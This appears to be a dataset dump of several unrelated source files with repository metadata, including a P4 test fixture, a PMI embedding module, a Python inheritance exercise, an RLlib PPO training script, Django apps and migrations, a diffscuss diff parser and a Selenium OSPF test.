P4Declaration("hash", P4Method("hash", type_params=(None, [
"O",
"T",
"D",
"M",]), params=[
P4Parameter("out", "result", "O", None),
P4Parameter("in", "algo", "HashAlgorithm", None),
P4Parameter("in", "base", "T", None),
P4Parameter("in", "data", "D", None),
P4Parameter("in", "max", "M", None),]))
)
prog_state.declare_global(
P4Extern("action_selector", type_params=[], methods=[P4Declaration("action_selector", P4Method("action_selector", type_params=(None, []), params=[
P4Parameter("none", "algorithm", "HashAlgorithm", None),
P4Parameter("none", "size", z3.BitVecSort(32), None),
P4Parameter("none", "outputWidth", z3.BitVecSort(32), None),])), ])
)
prog_state.declare_global(
Enum( "CloneType", ["I2E", "E2E", ])
)
prog_state.declare_global(
P4Extern("Checksum16", type_params=[], methods=[P4Declaration("Checksum16", P4Method("Checksum16", type_params=(None, []), params=[])), P4Declaration("get", P4Method("get", type_params=(z3.BitVecSort(16), [
"D",]), params=[
P4Parameter("in", "data", "D", None),])), ])
)
prog_state.declare_global(
P4Declaration("verify_checksum", P4Method("verify_checksum", type_params=(None, [
"T",
"O",]), params=[
P4Parameter("in", "condition", z3.BoolSort(), None),
P4Parameter("in", "data", "T", None),
P4Parameter("in", "checksum", "O", None),
P4Parameter("none", "algo", "HashAlgorithm", None),]))
)
prog_state.declare_global(
P4Declaration("update_checksum", P4Method("update_checksum", type_params=(None, [
"T",
"O",]), params=[
P4Parameter("in", "condition", z3.BoolSort(), None),
P4Parameter("in", "data", "T", None),
P4Parameter("inout", "checksum", "O", None),
P4Parameter("none", "algo", "HashAlgorithm", None),]))
)
prog_state.declare_global(
P4Declaration("verify_checksum_with_payload", P4Method("verify_checksum_with_payload", type_params=(None, [
"T",
"O",]), params=[
P4Parameter("in", "condition", z3.BoolSort(), None),
P4Parameter("in", "data", "T", None),
P4Parameter("in", "checksum", "O", None),
P4Parameter("none", "algo", "HashAlgorithm", None),]))
)
prog_state.declare_global(
P4Declaration("update_checksum_with_payload", P4Method("update_checksum_with_payload", type_params=(None, [
"T",
"O",]), params=[
P4Parameter("in", "condition", z3.BoolSort(), None),
P4Parameter("in", "data", "T", None),
P4Parameter("inout", "checksum", "O", None),
P4Parameter("none", "algo", "HashAlgorithm", None),]))
)
prog_state.declare_global(
P4Declaration("resubmit", P4Method("resubmit", type_params=(None, [
"T",]), params=[
P4Parameter("in", "data", "T", None),]))
)
prog_state.declare_global(
P4Declaration("recirculate", P4Method("recirculate", type_params=(None, [
"T",]), params=[
P4Parameter("in", "data", "T", None),]))
)
prog_state.declare_global(
P4Declaration("clone", P4Method("clone", type_params=(None, []), params=[
P4Parameter("in", "type", "CloneType", None),
P4Parameter("in", "session", z3.BitVecSort(32), None),]))
)
prog_state.declare_global(
P4Declaration("clone3", P4Method("clone3", type_params=(None, [
"T",]), params=[
P4Parameter("in", "type", "CloneType", None),
P4Parameter("in", "session", z3.BitVecSort(32), None),
P4Parameter("in", "data", "T", None),]))
)
prog_state.declare_global(
P4Declaration("truncate", P4Method("truncate", type_params=(None, []), params=[
P4Parameter("in", "length", z3.BitVecSort(32), None),]))
)
prog_state.declare_global(
P4Declaration("assert", P4Method("assert", type_params=(None, []), params=[
P4Parameter("in", "check", z3.BoolSort(), None),]))
)
prog_state.declare_global(
P4Declaration("assume", P4Method("assume", type_params=(None, []), params=[
P4Parameter("in", "check", z3.BoolSort(), None),]))
)
prog_state.declare_global(
P4Declaration("log_msg", P4Method("log_msg", type_params=(None, []), params=[
P4Parameter("none", "msg", z3.StringSort(), None),]))
)
prog_state.declare_global(
P4Declaration("log_msg", P4Method("log_msg", type_params=(None, [
"T",]), params=[
P4Parameter("none", "msg", z3.StringSort(), None),
P4Parameter("in", "data", "T", None),]))
)
prog_state.declare_global(
ControlDeclaration(P4ParserType("Parser", params=[
P4Parameter("none", "b", "packet_in", None),
P4Parameter("out", "parsedHdr", "H", None),
P4Parameter("inout", "meta", "M", None),
P4Parameter("inout", "standard_metadata", "standard_metadata_t", None),], type_params=[
"H",
"M",]))
)
prog_state.declare_global(
ControlDeclaration(P4ControlType("VerifyChecksum", params=[
P4Parameter("inout", "hdr", "H", None),
P4Parameter("inout", "meta", "M", None),], type_params=[
"H",
"M",]))
)
prog_state.declare_global(
ControlDeclaration(P4ControlType("Ingress", params=[
P4Parameter("inout", "hdr", "H", None),
P4Parameter("inout", "meta", "M", None),
P4Parameter("inout", "standard_metadata", "standard_metadata_t", None),], type_params=[
"H",
"M",]))
)
prog_state.declare_global(
ControlDeclaration(P4ControlType("Egress", params=[
P4Parameter("inout", "hdr", "H", None),
P4Parameter("inout", "meta", "M", None),
P4Parameter("inout", "standard_metadata", "standard_metadata_t", None),], type_params=[
"H",
"M",]))
)
prog_state.declare_global(
ControlDeclaration(P4ControlType("ComputeChecksum", params=[
P4Parameter("inout", "hdr", "H", None),
P4Parameter("inout", "meta", "M", None),], type_params=[
"H",
"M",]))
)
prog_state.declare_global(
ControlDeclaration(P4ControlType("Deparser", params=[
P4Parameter("none", "b", "packet_out", None),
P4Parameter("in", "hdr", "H", None),], type_params=[
"H",]))
)
prog_state.declare_global(
ControlDeclaration(P4Package("V1Switch", params=[
P4Parameter("none", "p", TypeSpecializer("Parser", "H", "M", ), None),
P4Parameter("none", "vr", TypeSpecializer("VerifyChecksum", "H", "M", ), None),
P4Parameter("none", "ig", TypeSpecializer("Ingress", "H", "M", ), None),
P4Parameter("none", "eg", TypeSpecializer("Egress", "H", "M", ), None),
P4Parameter("none", "ck", TypeSpecializer("ComputeChecksum", "H", "M", ), None),
P4Parameter("none", "dep", TypeSpecializer("Deparser", "H", ), None),],type_params=[
"H",
"M",]))
)
prog_state.declare_global(
HeaderType("H", prog_state, fields=[("a", z3.BitVecSort(8)), ], type_params=[])
)
prog_state.declare_global(
StructType("Headers", prog_state, fields=[("h", "H"), ], type_params=[])
)
prog_state.declare_global(
StructType("Meta", prog_state, fields=[], type_params=[])
)
prog_state.declare_global(
P4Declaration("do_thing", P4Function("do_thing", return_type=z3.BitVecSort(8), params=[
P4Parameter("out", "d", z3.BitVecSort(32), None),], body=BlockStatement([
P4Return(P4Cast(z3.BitVecVal(1, 32), z3.BitVecSort(8))),]
) ) )
)
prog_state.declare_global(
ControlDeclaration(P4Control(
name="ingress",
type_params=[],
params=[
P4Parameter("inout", "h", "Headers", None),
P4Parameter("inout", "m", "Meta", None),
P4Parameter("inout", "sm", "standard_metadata_t", None),],
const_params=[],
body=BlockStatement([
MethodCallStmt(MethodCallExpr("do_thing", [], P4Member("sm", "enq_timestamp"), )),
AssignmentStatement(P4Member(P4Member("h", "h"), "a"), 1),]
),
local_decls=[]
))
)
prog_state.declare_global(
ControlDeclaration(P4Parser(
name="p",
type_params=[],
params=[
P4Parameter("none", "b", "packet_in", None),
P4Parameter("out", "h", "Headers", None),
P4Parameter("inout", "m", "Meta", None),
P4Parameter("inout", "sm", "standard_metadata_t", None),],
const_params=[],
local_decls=[],
body=ParserTree([
ParserState(name="start", select="accept",
components=[ ]),
])
))
)
prog_state.declare_global(
ControlDeclaration(P4Control(
name="vrfy",
type_params=[],
params=[
P4Parameter("inout", "h", "Headers", None),
P4Parameter("inout", "m", "Meta", None),],
const_params=[],
body=BlockStatement([]
),
local_decls=[]
))
)
prog_state.declare_global(
ControlDeclaration(P4Control(
name="update",
type_params=[],
params=[
P4Parameter("inout", "h", "Headers", None),
P4Parameter("inout", "m", "Meta", None),],
const_params=[],
body=BlockStatement([]
),
local_decls=[]
))
)
prog_state.declare_global(
ControlDeclaration(P4Control(
name="egress",
type_params=[],
params=[
P4Parameter("inout", "h", "Headers", None),
P4Parameter("inout", "m", "Meta", None),
P4Parameter("inout", "sm", "standard_metadata_t", None),],
const_params=[],
body=BlockStatement([]
),
local_decls=[]
))
)
prog_state.declare_global(
ControlDeclaration(P4Control(
name="deparser",
type_params=[],
params=[
P4Parameter("none", "b", "packet_out", None),
P4Parameter("in", "h", "Headers", None),],
const_params=[],
body=BlockStatement([]
),
local_decls=[]
))
)
prog_state.declare_global(
InstanceDeclaration("main", "V1Switch", ConstCallExpr("p", ), ConstCallExpr("vrfy", ), ConstCallExpr("ingress", ), ConstCallExpr("egress", ), ConstCallExpr("update", ), ConstCallExpr("deparser", ), )
)
var = prog_state.get_main_function()
return var if isinstance(var, P4Package) else None
| [
"noreply@github.com"
] | p4gauntlet.noreply@github.com |
12631fa3eb7b47872dab382bbdbf156c15689b08 | 1215102b7853653e241e6dfcfc88a0a260aaf3dc | /hyperhyper/pmi.py | f0a385d3a7982cbe0f5086463485244ff486d582 | [
"BSD-2-Clause"
] | permissive | jfilter/hyperhyper | 81cf09763f1b1bebe8b581d4e60a53295babcd77 | 30983a82b1db037408de56bdddde9a5a9508c656 | refs/heads/master | 2023-01-02T00:24:59.259407 | 2020-10-25T21:46:14 | 2020-10-25T21:46:14 | 189,021,107 | 14 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,145 | py | """
implements PMI matrix (Pointwise mutual information)
See: https://en.wikipedia.org/wiki/Pointwise_mutual_information
"""
import heapq
import numpy as np
from gensim import matutils
from scipy.sparse import csr_matrix, dok_matrix
def calc_pmi(counts, cds):
"""
Calculates e^PMI; PMI without the log().
"""
sum_w = np.array(counts.sum(axis=1))[:, 0]
sum_c = np.array(counts.sum(axis=0))[0, :]
if cds != 1:
sum_c = sum_c ** cds
sum_total = sum_c.sum()
sum_w = np.reciprocal(sum_w)
sum_c = np.reciprocal(sum_c)
pmi = csr_matrix(counts)
pmi = multiply_by_rows(pmi, sum_w)
pmi = multiply_by_columns(pmi, sum_c)
pmi = pmi * sum_total
return pmi
def multiply_by_rows(matrix, row_coefs):
normalizer = dok_matrix((len(row_coefs), len(row_coefs)))
normalizer.setdiag(row_coefs)
return normalizer.tocsr().dot(matrix)
def multiply_by_columns(matrix, col_coefs):
normalizer = dok_matrix((len(col_coefs), len(col_coefs)))
normalizer.setdiag(col_coefs)
return matrix.dot(normalizer.tocsr())
class PPMIEmbedding:
"""
Base class for explicit representations. Assumes that the serialized input is e^PMI.
Positive PMI (PPMI) with negative sampling (neg).
Negative samples shift the PMI matrix before truncation.
"""
def __init__(self, matrix, normalize=True, neg=1):
self.m = matrix
self.m.data = np.log(self.m.data)
# not needed?
# # self.normal = normalize
if neg is not None:
self.m.data -= np.log(neg)
self.m.data[self.m.data < 0] = 0
self.m.eliminate_zeros()
if normalize:
self.normalize()
def normalize(self):
m2 = self.m.copy()
m2.data **= 2
norm = np.reciprocal(np.sqrt(np.array(m2.sum(axis=1))[:, 0]))
normalizer = dok_matrix((len(norm), len(norm)))
normalizer.setdiag(norm)
self.m = normalizer.tocsr().dot(self.m)
def represent(self, w_idx):
return self.m[w_idx, :]
def similarity(self, w1, w2):
"""
Assumes the vectors have been normalized.
"""
return self.represent(w1).dot(self.represent(w2).T)[0, 0]
def most_similar(self, w, n=10):
"""
Assumes the vectors have been normalized.
"""
scores = self.m.dot(self.represent(w).T).T.tocsr()
return heapq.nlargest(n, zip(scores.data, scores.indices))
# TODO: working?
def most_similar_vectors(self, positives, negatives, topn=10):
"""
Some parts taken from gensim.
https://github.com/RaRe-Technologies/gensim/blob/ea87470e4c065676d3d33df15b8db4192b30ebc1/gensim/models/keyedvectors.py#L690
"""
mean = [np.squeeze(self.represent(x).toarray()) for x in positives] + [-1 * np.squeeze(self.represent(x).toarray()) for x in negatives]
mean = matutils.unitvec(np.array(mean).mean(axis=0)).astype(np.float32)
dists = self.m.dot(mean)
best = matutils.argsort(dists, topn=topn, reverse=True)
return [(best_idx, float(dists[best_idx])) for best_idx in best]
| [
"hi@jfilter.de"
] | hi@jfilter.de |
4086e3b1a38b44ca64c3c26ab771c4058a470927 | c2bdcd5aec95d5c4ac4322f166c2ef9b2b8992f9 | /kurstag_8/loesungen_8/Kreditkarte_Loesung2.py | 68fa57d69d26630f26eb934afd6fa936dafcb8d2 | [] | no_license | softborg/Python_HWZ_Start | 4437c5d8676301db8f4c42b75c98f0cc91320012 | 6361647113365df66e3ad84a0d1d1b563137ebbd | refs/heads/master | 2022-07-21T16:27:30.333598 | 2022-07-12T12:08:37 | 2022-07-12T12:08:37 | 252,724,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,099 | py | # coding=utf8
# Aufgabe 2 - Kreditkarte
# 1. erstellen sie folgende Klassen 'Kreditkarte', 'Visa' und 'Mastercard
# 2. beim Instanziieren soll die Kartennummer mitgegeben werden, die Kartennummer ist public
# 3. Die Klassen 'Visa' und 'Mastercard' erben von 'Kreditkarte' und haben jeweils einen eignen Initalisierung
# 4. Bei der Initalisierung der Visa Kartennummer wird die Endung "-1944" angefügt
# 5. Bei der Initalisierung der Mastercard Kartennummer wird die Endung "-1234" angefügt
# 6. Instanziieren sie jeweils eine Visa- und ein Mastercard und eine Kreditkarte !
# 7. Geben sie jeweils die Kartennummer aus
class Kreditkarte:
def __init__(self, kartennr):
self.kartennr = kartennr
class Visa(Kreditkarte):
def __init__(self, kartennr):
self.kartennr = kartennr + "-1944"
class Mastercard(Kreditkarte):
def __init__(self, kartennr):
self.kartennr = kartennr + "-1234"
visa = Visa("412340998")
print(visa.kartennr)
mastercard = Mastercard("77770999")
print(mastercard.kartennr)
kreditkarte = Kreditkarte("1239")
print(kreditkarte.kartennr)
| [
"stefan.berger@softborg.com"
] | stefan.berger@softborg.com |
31fa03847837f428a42b58c029ab3b2371f78651 | 02c6b39399c1cfb434ad718c90bed3d8e6310ed0 | /training/ppo/tune/tune_train_PPO_car.py | dc4022a6f9ce60ae09adfcb96cc19810c33bb75c | [] | no_license | phate09/SafeDRL | 09b8924fa91aa43cf543ea5727ebe4cc8e13c0a5 | 3d4278eaaabb046a90fc1cebd1b5862d63dc5894 | refs/heads/master | 2022-09-17T05:12:28.529329 | 2022-08-29T08:21:32 | 2022-08-29T08:21:32 | 204,663,981 | 8 | 3 | null | 2021-12-02T14:13:46 | 2019-08-27T09:07:04 | Python | UTF-8 | Python | false | false | 3,401 | py | import random
from datetime import datetime
import numpy as np
import ray
from gym.vector.utils import spaces
from ray import tune
from ray.rllib.models import ModelCatalog
from ray.rllib.models.torch.fcnet import FullyConnectedNetwork as TorchFC
from ray.rllib.models.torch.torch_modelv2 import TorchModelV2
from ray.rllib.utils.framework import try_import_torch
from environment.stopping_car import StoppingCar
torch, nn = try_import_torch()
custom_input_space = spaces.Box(low=-np.inf, high=np.inf, shape=(2,), dtype=np.float32)
class TorchCustomModel(TorchModelV2, nn.Module):
"""Example of a PyTorch custom model that just delegates to a fc-net."""
def __init__(self, obs_space, action_space, num_outputs, model_config, name):
TorchModelV2.__init__(self, custom_input_space, action_space, num_outputs, model_config, name)
nn.Module.__init__(self)
self.torch_sub_model = TorchFC(custom_input_space, action_space, num_outputs, model_config, name)
def forward(self, input_dict, state, seq_lens):
input_dict["obs"] = input_dict["obs"].float()[:, -2:]
fc_out, _ = self.torch_sub_model(input_dict, state, seq_lens)
return fc_out, []
def value_function(self):
return torch.reshape(self.torch_sub_model.value_function(), [-1])
def get_PPO_config(seed, use_gpu=1):
ModelCatalog.register_custom_model("my_model", TorchCustomModel)
config = {"env": StoppingCar, #
"model": {"custom_model": "my_model", "fcnet_hiddens": [64, 64], "fcnet_activation": "relu"}, # model config," "custom_model": "my_model"
"vf_share_layers": False,
"lr": 5e-4,
"num_gpus": use_gpu,
"vf_clip_param": 100000,
"grad_clip": 2500,
"clip_rewards": 5,
"num_workers": 3, # parallelism
"num_envs_per_worker": 10,
"batch_mode": "complete_episodes",
"evaluation_interval": 10,
"evaluation_num_episodes": 20,
"use_gae": True, #
"lambda": 0.95, # gae lambda param
"num_sgd_iter": 10,
"train_batch_size": 4000,
"sgd_minibatch_size": 1024,
"rollout_fragment_length": 1000,
"framework": "torch",
"horizon": 1000,
"seed": seed,
"evaluation_config": {
# Example: overriding env_config, exploration, etc:
# "env_config": {...},
"explore": False
},
"env_config": {"cost_fn": tune.grid_search([0]),
"epsilon_input": tune.grid_search([0])} #
}
return config
if __name__ == "__main__":
seed = 1234
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
ray.init(local_mode=True, include_dashboard=True, log_to_driver=False)
config = get_PPO_config(use_gpu=0.5, seed=seed)
datetime_str = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
tune.run(
"PPO",
stop={"info/num_steps_trained": 2e8, "episode_reward_mean": -2e1},
config=config,
name=f"tune_PPO_stopping_car",
checkpoint_freq=10,
checkpoint_at_end=True,
log_to_file=True,
# resume="PROMPT",
verbose=1,
num_samples=10
)
ray.shutdown()
| [
"phate09@hotmail.it"
] | phate09@hotmail.it |
5ca47a8f2ebd168cadb146b40760ae74bf5b65dd | a913684fe348945c2b79786115fd392945cfcf72 | /user/urls.py | 314e6f4677e2c1433fef3c06f975cb168ecb7b44 | [] | no_license | LukaszMalucha/docker-django | 0332c4153d50add049db36479079ace2c664bea2 | 4b34f835b7ea3f8f9baa9956943b4ba9111f39fa | refs/heads/master | 2023-02-03T05:56:10.059009 | 2020-12-19T16:55:06 | 2020-12-19T16:55:06 | 322,545,925 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | from django.urls import path
from user import views
app_name = 'user'
urlpatterns = [
path("create/", views.CreateUserView.as_view(), name="create"),
path("authenticate/", views.CreateTokenView.as_view(), name="authenticate"),
path("my-account/", views.ManageUserView.as_view(), name="my-account"),
path("current-user/", views.CurrentUserApiView.as_view(), name="current-user"),
]
| [
"lucasmalucha@gmail.com"
] | lucasmalucha@gmail.com |
8f5ad21cd04e55f5a29773af97e8c3682ed21a87 | 02843d06b2a19b1d864561ad0c960c81dc11d5dd | /apps/enquiry/admin.py | 21b06c4de52f39d25c2cf2017c69c72d79403956 | [] | no_license | hqpr/amazing-asia | b0eb450937d007f6beed96b2e5ff09e2200b0cad | 5a749c77514d97359a3eaa7207943563cd2a7c9a | refs/heads/master | 2021-04-25T16:33:24.205942 | 2017-11-30T17:05:27 | 2017-11-30T17:05:27 | 108,191,181 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | from django.contrib import admin
from .models import Enquiry
admin.site.register(Enquiry)
| [
"adubnyak@gmail.com"
] | adubnyak@gmail.com |
bd52bfd00c8d7b8e6a83dda80689159e389c7d39 | 3a57805be67d568bc516cc821deb3d912dbf87ad | /diffscuss/walker.py | feabedbadb58dae353f35514507b42580832274f | [
"MIT"
] | permissive | tomheon/diffscuss | 8e0ee331cc37dd7a3607e2a434fb59ea9ca69d3f | 53f2d001bd3a5cb80c6ada16b4e570afd1989a09 | refs/heads/master | 2023-08-15T23:05:59.277846 | 2021-06-17T21:19:39 | 2021-06-17T21:19:39 | 8,643,720 | 39 | 3 | MIT | 2018-03-21T16:33:17 | 2013-03-08T05:18:43 | Python | UTF-8 | Python | false | false | 4,486 | py | from collections import namedtuple
import re
class BadNestingException(Exception):
pass
class MissingAuthorException(Exception):
pass
class EmptyCommentException(Exception):
pass
class CommentInHeaderException(Exception):
pass
DIFF_HEADER = 'DIFF_HEADER'
DIFF = 'DIFF'
COMMENT_HEADER = 'COMMENT_HEADER'
COMMENT_BODY = 'COMMENT_BODY'
def walk(fil):
"""
Walk a Diffscuss file, yielding either:
(DIFF, line)
For each line that is part of a diff,
(DIFF_HEADER, line)
For each diff header line (e.g. Index lines, range lines),
(COMMENT_HEADER, line)
for each diffscuss comment header line, or
(COMMENT_BODY, line)
for each diffscuss body line.
@fil: a file-like object containing Diffscuss.
The default error handler raises the following exceptions:
MissingAuthorException: if there's no author header at the start
of a comment.
BadNestingException: if a comment is improperly nested.
EmptyCommentException: if a comment has no body.
CommentInHeaderException: if a comment appears in a diff header.
"""
line = fil.readline()
in_header = False
# allow the normal magic header lines (such as encoding), but
# don't consider them part of the diffscuss file.
while line.startswith("#") and not _is_diffscuss_line(line):
line = fil.readline()
while True:
if not line:
break
if _is_diffscuss_line(line):
if in_header:
raise CommentInHeaderException()
tagged_comment_lines, line = _read_comment(line, fil)
for tag, comment_line in tagged_comment_lines:
yield (tag, comment_line)
# continue so we don't read another line at the bottom
continue
elif in_header or _is_not_diff_line(line):
# check for non-diff line has to come second, since the
# --- and +++ in the header will read as diff lines
# otherwise
yield (DIFF_HEADER, line)
in_header = not _is_range_line(line)
else:
yield (DIFF, line)
line = fil.readline()
def _read_comment(line, fil):
header_lines, line = _read_header(line, fil)
_check_header(header_lines)
body_lines, line = _read_body(line, fil)
_check_body(body_lines)
return ([(COMMENT_HEADER, header_line)
for header_line
in header_lines] +
[(COMMENT_BODY, body_line)
for body_line
in body_lines],
line)
def _check_body(body_lines):
if not body_lines:
raise EmptyCommentException()
def _check_header(header_lines):
for line in header_lines:
if _is_author_line(line):
return
if not _is_empty_header(line):
raise MissingAuthorException()
raise MissingAuthorException()
def _level(line):
header_match = _is_header(line)
if header_match:
return len(header_match.group(1)) - 1
body_match = _is_body(line)
if body_match:
return len(body_match.group(1)) - 1
return None
def _read_header(line, fil):
return _read_comment_part(line, fil, _is_header)
def _read_body(line, fil):
return _read_comment_part(line, fil, _is_body)
def _read_comment_part(line, fil, pred):
part_lines = []
level = _level(line)
while True:
if not pred(line):
break
if _level(line) != level:
raise BadNestingException()
part_lines.append(line)
line = fil.readline()
return part_lines, line
HEADER_RE = re.compile(r'^(#[*]+)( |$)')
EMPTY_HEADER_RE = re.compile(r'^(#[*]+)\s*$')
def _is_header(line):
return HEADER_RE.match(line)
def _is_empty_header(line):
return EMPTY_HEADER_RE.match(line)
AUTHOR_RE = re.compile(r'^(#[*]+) author: ')
def _is_author_line(line):
return AUTHOR_RE.match(line)
BODY_RE = re.compile(r'^(#[-]+)( |$)')
def _is_body(line):
return BODY_RE.match(line)
def _is_range_line(line):
return line.startswith('@@')
def _is_diffscuss_line(line):
return line.startswith('#*') or line.startswith('#-')
# legal starts to a unified diff line inside a hunk
DIFF_CHARS = (' ', '+', '-', '\\')
def _is_not_diff_line(line):
"""
Treat a totally blank line as a diff line to be flexible, since emacs
can strip trailing spaces.
"""
return line.strip() and not line.startswith(DIFF_CHARS)
| [
"tomheon@gmail.com"
] | tomheon@gmail.com |
031d3b14a2ac7dac2dfe0897acea866b23cce203 | 78d7d7aeb78a8cea6d0e10b89fc4aa6c46c95227 | /1910.py | bb86d16343515a3463d889f65c184f6a9f3e47a0 | [] | no_license | GenryEden/kpolyakovName | 97db13ef93061a8c2afc6cc5acd91337f79063f1 | c5d7f631ae7ec8770e56170574b82ea2b7d8a4d9 | refs/heads/master | 2023-05-23T21:22:51.983756 | 2021-06-21T08:56:49 | 2021-06-21T08:56:49 | 350,466,773 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 375 | py | def perebor(alphabet, length):
if length == 0:
yield ''
else:
for letter in alphabet:
for word in perebor(alphabet, length-1):
yield letter+word
def check(word):
toCount = 'РСТМ'
cnt = 0
for s in word:
if s in toCount:
cnt += 1
return cnt >= 3
ans = set()
for word in perebor('РУСТАМ', 6):
if check(word):
ans.add(word)
print(len(ans)) | [
"a926788@gmail.com"
] | a926788@gmail.com |
e99da711b9b45b9235b594bcc9117c07bc1d1f4a | e2e08d7c97398a42e6554f913ee27340226994d9 | /pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_OSPF/test_c140802.py | 1986465490ec5bcd8e0a0201dc5ae7f3c2d1a163 | [] | no_license | lizhuoya1111/Automated_testing_practice | 88e7be512e831d279324ad710946232377fb4c01 | b3a532d33ddeb8d01fff315bcd59b451befdef23 | refs/heads/master | 2022-12-04T08:19:29.806445 | 2020-08-14T03:51:20 | 2020-08-14T03:51:20 | 287,426,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,481 | py |
import pytest
import time
import sys
from os.path import dirname, abspath
sys.path.insert(0, dirname(dirname(abspath(__file__))))
from page_obj.scg.scg_def_ospf import *
from page_obj.scg.scg_def_vlan_interface import *
from page_obj.scg.scg_def_bridge import *
from page_obj.common.rail import *
from page_obj.scg.scg_def_physical_interface import *
from page_obj.common.ssh import *
from page_obj.scg.scg_def_dhcp import *
from page_obj.scg.scg_dev import *
from page_obj.scg.scg_def_ifname_OEM import *
test_id = 140802
def test_c140802(browser):
try:
login_web(browser, url=dev1)
start_ospf_jyl(browser)
time.sleep(0.5)
edit_ospf_interface_jyl(browser, ospf_interface="br_0", auth_type="简单密码", text_key="123456", save="yes")
loginfo1 = get_log_info(browser, 管理日志)
time.sleep(0.5)
# print(loginfo1)
edit_ospf_interface_jyl(browser, ospf_interface="br_0", priority="1", hello_interval="10", dead_interval="40",
auth_type="无", save="yes")
stop_ospf_jyl(browser)
try:
assert "成功修改" in loginfo1
rail_pass(test_run_id, test_id)
except:
rail_fail(test_run_id, test_id)
assert "成功修改" in loginfo1
except Exception as err:
# 如果上面的步骤有报错,重新设备,恢复配置
print(err)
reload(hostip=dev1)
rail_fail(test_run_id, test_id)
assert False
if __name__ == '__main__':
pytest.main(["-v", "-s", "test_c" + str(test_id) + ".py"])
| [
"15501866985@163.com"
] | 15501866985@163.com |
8942552852c2ba4597d1c70ce5a8adf7e957cec7 | 801510e45d9aebe5c5b8b09a3ce4453a3a11a3ca | /django/oneTable/appOneTable/models.py | 13b38b271e63473033021ebe53d6d188f7645474 | [] | no_license | michelleshan/coding_dojo_python_course | 5581ebca0a645ba7231a2da2d2d64d6c3735bfc4 | e20e8195950004ef0aa09e6b0f84e7f05bd355e8 | refs/heads/master | 2022-11-21T01:34:54.309175 | 2020-07-16T03:29:45 | 2020-07-16T03:29:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 806 | py | from django.db import models
# ONE Dungeon has MANY prisoners
# ONE Prisoner has ONE Dungeon
# ONE to MANY
# ONE Dungeon has MANY dislikes
# ONE Prisoner has MANY dislikes
# MANY to MANY
class Dungeon(models.Model):
name = models.TextField()
num_people_inside = models.IntegerField()
location = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Prisoner(models.Model):
name = models.TextField()
dungeon_inside = models.ForeignKey(Dungeon,related_name="all_prisoners",on_delete=models.CASCADE)
dungeons_disliked = models.ManyToManyField(Dungeon,related_name='prisoners_that_dislike')
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True) | [
"michellehan@Michelles-Air.attlocal.net"
] | michellehan@Michelles-Air.attlocal.net |
70bd5e42cf5abc0bac19ba712cb49c33a704467a | 0420ce2fc8799d5fbd6e96313e6716f5e2ef825b | /bagogold/bagogold/migrations/0002_auto_20150626_2230.py | f994aba4d8be4dc46dd336f174e53b2b592b387d | [] | no_license | nizbel/bag-of-gold | 1da10acef4d73b8426ca3329b37a28c5f9587af4 | a3fd89eb47d33d546bd91947f033d71218c8700f | refs/heads/master | 2022-11-13T01:07:26.934813 | 2020-01-14T16:00:16 | 2020-01-14T16:00:16 | 275,689,573 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,554 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('bagogold', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Operacao',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('day_trade', models.NullBooleanField(default=False, verbose_name=b'\xc3\x89 day trade?')),
],
),
migrations.CreateModel(
name='OperacaoAcao',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('preco_unitario', models.DecimalField(verbose_name=b'Pre\xc3\xa7o unit\xc3\xa1rio', max_digits=11, decimal_places=2)),
('data', models.DateField(verbose_name=b'Data')),
('corretagem', models.DecimalField(verbose_name=b'Corretagem', max_digits=11, decimal_places=2)),
('emolumentos', models.DecimalField(verbose_name=b'Emolumentos', max_digits=11, decimal_places=2)),
('tipo_operacao', models.CharField(max_length=1, verbose_name=b'Tipo de opera\xc3\xa7\xc3\xa3o')),
('consolidada', models.NullBooleanField(verbose_name=b'Consolidada?')),
('acao', models.ForeignKey(to='bagogold.Acao')),
],
),
migrations.CreateModel(
name='Provento',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('valor_unitario', models.DecimalField(verbose_name=b'Valor unit\xc3\xa1rio', max_digits=11, decimal_places=7)),
('tipo_provento', models.CharField(max_length=1, verbose_name=b'Tipo de provento')),
('data_ex', models.DateField(verbose_name=b'Data EX')),
('data_pagamento', models.DateField(verbose_name=b'Data do pagamento')),
('acao', models.ForeignKey(to='bagogold.Acao')),
],
),
migrations.AddField(
model_name='operacao',
name='compra',
field=models.ForeignKey(related_name='compra', to='bagogold.OperacaoAcao'),
),
migrations.AddField(
model_name='operacao',
name='venda',
field=models.ForeignKey(related_name='venda', to='bagogold.OperacaoAcao'),
),
]
| [
"kingbowserii@gmail.com"
] | kingbowserii@gmail.com |
869a4c69c3206641fbf875e3c5dda79d6c2c898b | fde8c89b352076f95cc16e589b1baf18f7befb51 | /gabbi/json_parser.py | 430a64a64e3cfb16f9e4c2f2260c5414d4e57408 | [] | no_license | 571451370/devstack_mitaka | b11145256deab817bcdf60a01a67bb6b2f9ddb52 | 1bdd3f2598f91c1446b85c5b6def7784a2f6ab02 | refs/heads/master | 2020-08-26T12:53:07.482514 | 2017-04-12T01:32:55 | 2017-04-12T01:32:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,760 | py | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
